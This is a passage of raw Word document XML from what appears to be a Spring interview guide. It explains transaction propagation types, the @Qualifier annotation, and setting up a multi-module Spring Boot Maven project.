          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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re are seven types of transaction propagation in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B23A1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REQUIRED (Default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706AEBB4"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join the existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E13B72"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 new transaction will be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB26359"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st common and default propagation type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359A2C7E"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sure that a method runs within the scope of a transaction, whether a transaction exists or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9AB9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D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6629E8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70C571C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1AB18F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BE999C3"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QUIRES_NEW:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCCC78"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always create a new transaction, regardless of whether there is an existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FCF089"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temporarily until the new transaction is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4828D"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ful for cases where you want a method to run in a completely new transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4031195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a method should run in its own transaction, independent of the caller’s transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A5E85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S_NEW)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CEFAE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07BD9E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A62CA3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F5216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NESTED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59107DA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create a nested transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B18A3E"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nested transaction will be able to commit or roll back independently of the outer transaction. However, if the outer transaction is rolled back, the nested transaction will also be rolled back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E11622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a method to behave like a sub-transaction inside a parent transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF9F7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run a method inside a nested transaction, ensuring that it can commit independently but still be rolled back if the parent fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5EA6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STED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE5E9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B3F934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1102157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FF183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SUPPORTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30505AC8"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15B786F9"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without any transaction (non-transactional).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC1A98B"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can work with or without a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91FDF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the method can either run within a transaction or outside a transaction, depending on whether one exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C960C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SUPPORTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439256A2"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6012625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3C5457A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AB2D77E"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NOT_SUPPORTED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A01B6FF"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for the duration of the method call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED60D47"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non-transactionally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C86948"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to ensure the method runs without any transaction, even if there is an existing one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477BDF2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perform an operation outside of a transaction context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762D8A1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OT_SUPPORTED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C17EF9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D4F86A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7EED150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4D5489"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NEVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0EA40"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method should never run within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13179B54"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an exception will be thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAEA595"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should not be invoked within a transactional context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4613043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enforce that a method should not be executed within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295AFE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VER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B4AA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1BABE0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41A086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C272F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DATORY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC29753"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07341A35"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n exception will be thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DE0891"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the method requires a transaction to be already in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB8E0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force that a method must be executed within an existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185477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MANDATORY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31126EC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2B31838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258F3F0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712AB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6633"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="17212D0F" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="277F583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Propagation Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B66F06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escription</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="5FCB8BAD" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ECA4E2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D (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6225D0E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oins an existing transaction or creates a new one if none exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="4278229C" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EBA455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_NEW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B01E34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creates a new one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="3E9C6A69" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D4870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STED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="154CCE8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es a nested transaction within an existing transaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="7C5C9B1F" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11AB15A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PPORTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B6AD43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uns within a transaction if one exists, else runs without a transaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="3FD3D2DB" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07B7DD6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_SUPPORTED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B4F2D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runs without a transaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="65AB035B" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C4CE55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VER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D07F7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rows an exception if called within a transaction, only runs without one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="4EF0887F" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CACAB4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NDATORY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="373387E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 an existing transaction, throws an exception if none exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CB14E1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516" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31263ACE" w14:textId="0F1AD931" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D36B89">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="593" w:name="_Toc197867807"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What @Qualifier in spring? What is the use of @Qualifier</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="593"/>
    </w:p>
    <w:p w14:paraId="23AAF329" w14:textId="71FD99F4" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB479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p w14:paraId="4121CB7E"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there are multiple beans of the same type in the Spring container, Spring will not know which one to inject. By using @Qualifier, you can explicitly specify which bean to inject by its name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488884CD"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85B991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ssume you have two beans of type Car in the Spring context, and you want to inject a specific one into another bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0DFC4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C93E43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20A7FE0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67CA4FA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575DA69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3ECC8C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8436DA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D30BFE" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047FE51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3983963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UV implements Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825A78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799863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47BEDC73"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n SUV");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BF3E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68D3B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8FC5F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you have a Driver class that depends on a Car:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A96CF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3C6255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Driver {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3393136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Car car;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C5B58" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E28FB4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3D01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Qualifier("sedan")  // This resolves the ambiguity by specifying the bean name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007BE17C"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Car(Car car) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B85FFC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car = car;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1614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5EF0302" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5323B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398E01F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ar.drive();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE3C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91A17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2ECAAC6"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C604585"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Qualifier("sedan") annotation tells Spring to inject the Sedan bean into the Driver class, even though there are multiple Car beans (Sedan and SUV).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457E61D"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value inside @Qualifier must match the name of the bean that you want to inject. In this case, if Sedan is annotated with @Component("sedan"), Spring will use that name to resolve the dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23EED4"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5C8E2470"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olving Ambiguity</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When there are multiple beans of the same type, @Qualifier helps resolve which specific bean should be injected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418CC68"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 @Autowired</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use @Qualifier in combination with @Autowired on constructor injection, field injection, or setter injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566684F3"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fying Bean Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The value passed to @Qualifier should match the name of the bean you want to inject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36074FF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Bean Name Customization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192BF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edan") // Custom name for the bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C74B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49AE64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4258B88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60AC0D0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437C944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D51D76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C1D30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the @Qualifier("sedan") will refer to the Sedan bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C88A8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5576591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alifier is used to resolve ambiguity when multiple beans of the same type exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3844CC9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helps specify which bean should be injected into a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426921F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typically used with @Autowired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF6F05" w14:textId="17B353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517" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C86358" w14:textId="3D834875" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="007A67BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="594" w:name="_Toc197867808"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create multiple modules using spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="594"/>
    </w:p>
    <w:p w14:paraId="4A45636C" w14:textId="326B07B2"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reate multiple modules using Spring Boot, you can organize your project into separate </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modul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odules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-module Maven/Gradle project</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each module can represent a specific piece of functionality, such as a service, controller, or data access layer. The modules will be part of a larger Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63040DA2"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by-Step Guide to Creating Multiple Modules with Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8BF3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reate a Parent Maven Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC810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irst, create a parent project using Maven or Gradle. The parent project will contain the common configuration and dependencies for all submodules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDC8A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irectory Structure Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1638491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multi-module-project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0858288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pom.xml (Parent pom file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3917BF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api (Module for API layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B9F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service (Module for service layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2789292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data (Module for data layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FC7AE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module-web (Module for web layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180409E6"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reate Parent pom.xml for Maven Projects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC7A7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the parent project (pom.xml), configure it as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent module</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that will manage dependencies, plugin versions, and shared configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2429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of parent pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF1EA0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34AC17D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491A576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129830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738DA5DD" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C20FD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38A17F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26A57B9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35830FC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ckaging&gt;pom&lt;/packaging&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000D016" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3B957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modules&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE1B5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api&lt;/module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CEF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service&lt;/module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E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data&lt;/module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618D211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web&lt;/module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A74F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s&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A74317" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C584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4E893B1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1AC7D4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Spring Boot Dependencies --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FE9A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1C3C77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EC743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parent&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65D20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2.5.4&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56372D0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 &lt;!-- lookup parent from repository --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC697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69F46B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769A46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7AD46119" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409DF4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06CA9A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25A6DD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0D96E70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12A83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6FD5B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aven-plugin&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DAF3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C57D3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506B24F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3975CBC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771880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215899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reate Submodules (Modules) in the Parent Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D1D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ch submodule should have its own pom.xml file. These modules will depend on the parent pom.xml for configuration and dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6B22C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module-api/pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552299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2B5CBA2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1F5E6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04D2E84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2A266FCC" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9BA3D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30E8B0C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69D224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3DC564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58BE6C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pom.xml&lt;/relativePath&gt; &lt;!-- Parent pom file --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5593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1A156611" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F94E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module-api&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438F070" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
